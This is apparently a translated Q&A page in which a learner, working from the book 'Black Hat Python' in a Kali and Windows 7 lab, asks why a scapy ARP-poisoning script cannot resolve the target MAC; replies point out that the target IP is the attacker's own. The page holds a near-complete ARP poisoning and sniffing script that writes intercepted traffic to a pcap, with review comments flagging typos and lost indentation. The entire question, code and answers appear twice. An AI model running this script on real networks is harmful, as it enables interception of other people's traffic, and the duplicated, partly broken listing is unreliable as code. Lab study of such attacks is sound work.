使用 scapy 进行 ARP 投毒:无法获取目标 MAC
ARP Poisoning with scapy: Failure to get target MAC
在 Justin Seitz 的《Black Hat Python》一书第四章中,有一节详细介绍了如何使用 scapy 进行 ARP 投毒。我在获取目标机器 IP 对应的 MAC 地址时遇到了问题。我使用 Kali 虚拟机作为攻击机器,使用 Win 7 虚拟机作为目标机器。
from scapy.all import *
import os
import sys
import threading
import signal
# Interface the script sends on and sniffs from.
interface = "eth0"
# NOTE(review): the ifconfig output shown on this page lists 10.0.2.15 as the
# address of this host's own eth0, so target_ip names the local machine rather
# than a second host; that matches the "Failed to get target MAC" result
# reported on the page.
target_ip = "10.0.2.15"
gateway_ip = "10.0.2.2"
# Number of packets the sniffer collects before it stops.
packet_count = 1000
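def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
    """Re-advertise the real IP-to-MAC bindings, then interrupt this process.

    Broadcasts five ARP replies (op=2) that pair gateway_ip with gateway_mac
    and five that pair target_ip with target_mac, which is intended to let the
    affected hosts replace the entries changed by the poisoning loop.
    Afterwards SIGINT is sent to the current process.
    """
    print("[*} Restoring target...")
    # Real gateway binding, addressed to the target's IP.
    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip,
             hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac), count=5)
    # Real target binding, addressed to the gateway's IP. The listing spelled
    # the class `Arp`, a name that is not defined anywhere in it; that raises
    # NameError and leaves the gateway's cache unrepaired.
    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip,
             hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=5)
    # SIGINT to our own PID surfaces as KeyboardInterrupt in the main thread.
    os.kill(os.getpid(), signal.SIGINT)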
def get_mac(ip_address):
    """Resolve ip_address to a MAC address with a broadcast ARP request.

    Returns the Ethernet source address of the first answer received, or
    None when nothing answers within the 2-second timeout and its retries.
    """
    arp_request = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address)
    answered, _ = srp(arp_request, timeout=2, retry=10)
    # Only the first (sent, received) pair is used.
    return next((reply[Ether].src for _sent, reply in answered), None)
# NOTE(review): indentation was lost in this listing, so the nesting of the
# statements that follow `except KeyboardInterrupt:` cannot be recovered with
# certainty; the code is left exactly as published.
#
# Builds two ARP replies (op=2) and appears to re-send both in an endless loop
# with a 2-second pause: one addressed to target_ip that claims gateway_ip,
# one addressed to gateway_ip that claims target_ip. hwsrc is never set here,
# so both replies carry whatever default scapy fills in (presumably the
# sending interface's MAC - confirm).
#
# Defensive view: a steady stream of unsolicited ARP replies that rebinds a
# gateway IP to a different MAC is the pattern ARP-monitoring tools and switch
# features such as Dynamic ARP Inspection are built to catch.
def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
# The local name below shadows the function's own name inside the body.
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
# NOTE(review): `posion_target` is not defined anywhere in this listing (the
# local above is `poison_target`), so this line raises NameError as written.
posion_target.hwdst = target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst = gateway_mac
print "[*] Beginning the ARP poison. [CTRL-C to stop]"
while True:
try:
send(poison_target)
send(poison_gateway)
# NOTE(review): `time` is not imported explicitly in this listing; it resolves
# only if the star import from scapy.all happens to provide it - confirm.
time.sleep(2)
except KeyboardInterrupt:
# On interrupt the real bindings are re-advertised via restore_target().
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
print "[*] ARP poison attack finished."
return
# Script body: resolve both MAC addresses, start the ARP loop in a background
# thread, capture packet_count packets for target_ip, write them to a pcap
# file, then restore the ARP bindings.
# NOTE(review): indentation was lost in this listing, so the extent of the
# if/else and try/except bodies is not recoverable with certainty; the code is
# left exactly as published.
conf.iface = interface
# Duplicate of the previous assignment.
conf.iface = interface
# Silence scapy's own console output.
conf.verb = 0
print "[*] Setting up %s" % interface
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
print "[!!!] Failed to get gateway MAC. Exiting."
# NOTE(review): exits with status 0 although resolution failed, so a caller
# cannot tell this path from success.
sys.exit(0)
else:
print "[*] Gateway %s is at %s" % (gateway_ip, gateway_mac)
target_mac = get_mac(target_ip)
if target_mac is None:
# This is the branch taken in the run shown on the page.
print "[!!!] Failed to get target MAC. Exiting."
sys.exit(0)
else:
print "[*] Target %s is at %s" % (target_ip, target_mac)
# NOTE(review): `posion_target` does not match the function defined above as
# `poison_target`, so this line raises NameError as written.
poison_thread = threading.Thread(target=posion_target, args=(
gateway_ip, gateway_mac, target_ip, target_mac))
poison_thread.start()
try:
print "[*] Starting sniffer for %d packets" % packet_count
# BPF filter: only IP traffic to or from target_ip is captured.
bpf_filter = "ip host %s" % target_ip
packets = sniff(count=packet_count, filter=bpf_filter, iface=interface)
# The capture is written to arper.pcap in the working directory; it holds the
# raw traffic of the filtered host and should be handled as sensitive data.
wrpcap('arper.pcap', packets)
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
except KeyboardInterrupt:
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
sys.exit(0)
攻击机器:
root@kali:~/Documents# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.0.2.15 netmask 255.255.255.0 broadcast 10.0.2.255
inet6 fe80::a00:27ff:fe81:b1df prefixlen 64 scopeid 0x20<link>
ether 08:00:27:81:b1:df txqueuelen 1000 (Ethernet)
RX packets 101529 bytes 101906744 (97.1 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 34775 bytes 3530239 (3.3 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 218 bytes 13972 (13.6 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 218 bytes 13972 (13.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
输出:
root@kali:~/Documents# sudo python arper.py
[*] Setting up eth0
[*] Gateway 10.0.2.2 is at 52:54:00:12:35:02
[!!!] Failed to get target MAC. Exiting.
你把 Kali(攻击机器)自己的 IP(10.0.2.15)用作了 target_ip。Win 虽然运行在同一台计算机上,但它是在虚拟机中运行的,而虚拟机通常有自己的 IP(参见 https://www.quora.com/Do-virtual-machines-have-their-own-IP )
甚至无法确定虚拟机中的 Win 是否自动处于同一网络。请在同一个 /24 网络(即 10.0.2.x/24,x 替换为具体数值)中为 Win 虚拟机和 Kali 分配静态 IP,参见 https://serverfault.com/questions/839443/giving-the-vm-an-own-ip-address
coder 是对的:首先用 ping 检查网络连通性是否已建立。
在 Justin Seitz 的《Black Hat Python》一书第四章中,有一节详细介绍了如何使用 scapy 进行 ARP 投毒。我在获取目标机器 IP 对应的 MAC 地址时遇到了问题。我使用 Kali 虚拟机作为攻击机器,使用 Win 7 虚拟机作为目标机器。
from scapy.all import *
import os
import sys
import threading
import signal
# Interface the script sends on and sniffs from.
interface = "eth0"
# NOTE(review): the ifconfig output shown on this page lists 10.0.2.15 as the
# address of this host's own eth0, so target_ip names the local machine rather
# than a second host; that matches the "Failed to get target MAC" result
# reported on the page.
target_ip = "10.0.2.15"
gateway_ip = "10.0.2.2"
# Number of packets the sniffer collects before it stops.
packet_count = 1000
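def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
    """Re-advertise the real IP-to-MAC bindings, then interrupt this process.

    Broadcasts five ARP replies (op=2) that pair gateway_ip with gateway_mac
    and five that pair target_ip with target_mac, which is intended to let the
    affected hosts replace the entries changed by the poisoning loop.
    Afterwards SIGINT is sent to the current process.
    """
    print("[*} Restoring target...")
    # Real gateway binding, addressed to the target's IP.
    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip,
             hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac), count=5)
    # Real target binding, addressed to the gateway's IP. The listing spelled
    # the class `Arp`, a name that is not defined anywhere in it; that raises
    # NameError and leaves the gateway's cache unrepaired.
    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip,
             hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=5)
    # SIGINT to our own PID surfaces as KeyboardInterrupt in the main thread.
    os.kill(os.getpid(), signal.SIGINT)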
def get_mac(ip_address):
    """Resolve ip_address to a MAC address with a broadcast ARP request.

    Returns the Ethernet source address of the first answer received, or
    None when nothing answers within the 2-second timeout and its retries.
    """
    arp_request = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address)
    answered, _ = srp(arp_request, timeout=2, retry=10)
    # Only the first (sent, received) pair is used.
    return next((reply[Ether].src for _sent, reply in answered), None)
# NOTE(review): indentation was lost in this listing, so the nesting of the
# statements that follow `except KeyboardInterrupt:` cannot be recovered with
# certainty; the code is left exactly as published.
#
# Builds two ARP replies (op=2) and appears to re-send both in an endless loop
# with a 2-second pause: one addressed to target_ip that claims gateway_ip,
# one addressed to gateway_ip that claims target_ip. hwsrc is never set here,
# so both replies carry whatever default scapy fills in (presumably the
# sending interface's MAC - confirm).
#
# Defensive view: a steady stream of unsolicited ARP replies that rebinds a
# gateway IP to a different MAC is the pattern ARP-monitoring tools and switch
# features such as Dynamic ARP Inspection are built to catch.
def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
# The local name below shadows the function's own name inside the body.
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
# NOTE(review): `posion_target` is not defined anywhere in this listing (the
# local above is `poison_target`), so this line raises NameError as written.
posion_target.hwdst = target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst = gateway_mac
print "[*] Beginning the ARP poison. [CTRL-C to stop]"
while True:
try:
send(poison_target)
send(poison_gateway)
# NOTE(review): `time` is not imported explicitly in this listing; it resolves
# only if the star import from scapy.all happens to provide it - confirm.
time.sleep(2)
except KeyboardInterrupt:
# On interrupt the real bindings are re-advertised via restore_target().
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
print "[*] ARP poison attack finished."
return
# Script body: resolve both MAC addresses, start the ARP loop in a background
# thread, capture packet_count packets for target_ip, write them to a pcap
# file, then restore the ARP bindings.
# NOTE(review): indentation was lost in this listing, so the extent of the
# if/else and try/except bodies is not recoverable with certainty; the code is
# left exactly as published.
conf.iface = interface
# Duplicate of the previous assignment.
conf.iface = interface
# Silence scapy's own console output.
conf.verb = 0
print "[*] Setting up %s" % interface
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
print "[!!!] Failed to get gateway MAC. Exiting."
# NOTE(review): exits with status 0 although resolution failed, so a caller
# cannot tell this path from success.
sys.exit(0)
else:
print "[*] Gateway %s is at %s" % (gateway_ip, gateway_mac)
target_mac = get_mac(target_ip)
if target_mac is None:
# This is the branch taken in the run shown on the page.
print "[!!!] Failed to get target MAC. Exiting."
sys.exit(0)
else:
print "[*] Target %s is at %s" % (target_ip, target_mac)
# NOTE(review): `posion_target` does not match the function defined above as
# `poison_target`, so this line raises NameError as written.
poison_thread = threading.Thread(target=posion_target, args=(
gateway_ip, gateway_mac, target_ip, target_mac))
poison_thread.start()
try:
print "[*] Starting sniffer for %d packets" % packet_count
# BPF filter: only IP traffic to or from target_ip is captured.
bpf_filter = "ip host %s" % target_ip
packets = sniff(count=packet_count, filter=bpf_filter, iface=interface)
# The capture is written to arper.pcap in the working directory; it holds the
# raw traffic of the filtered host and should be handled as sensitive data.
wrpcap('arper.pcap', packets)
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
except KeyboardInterrupt:
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
sys.exit(0)
攻击机器:
root@kali:~/Documents# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.0.2.15 netmask 255.255.255.0 broadcast 10.0.2.255
inet6 fe80::a00:27ff:fe81:b1df prefixlen 64 scopeid 0x20<link>
ether 08:00:27:81:b1:df txqueuelen 1000 (Ethernet)
RX packets 101529 bytes 101906744 (97.1 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 34775 bytes 3530239 (3.3 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 218 bytes 13972 (13.6 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 218 bytes 13972 (13.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
输出:
root@kali:~/Documents# sudo python arper.py
[*] Setting up eth0
[*] Gateway 10.0.2.2 is at 52:54:00:12:35:02
[!!!] Failed to get target MAC. Exiting.
你把 Kali(攻击机器)自己的 IP(10.0.2.15)用作了 target_ip。Win 虽然运行在同一台计算机上,但它是在虚拟机中运行的,而虚拟机通常有自己的 IP(参见 https://www.quora.com/Do-virtual-machines-have-their-own-IP )
甚至无法确定虚拟机中的 Win 是否自动处于同一网络。请在同一个 /24 网络(即 10.0.2.x/24,x 替换为具体数值)中为 Win 虚拟机和 Kali 分配静态 IP,参见 https://serverfault.com/questions/839443/giving-the-vm-an-own-ip-address
coder 是对的:首先用 ping 检查网络连通性是否已建立。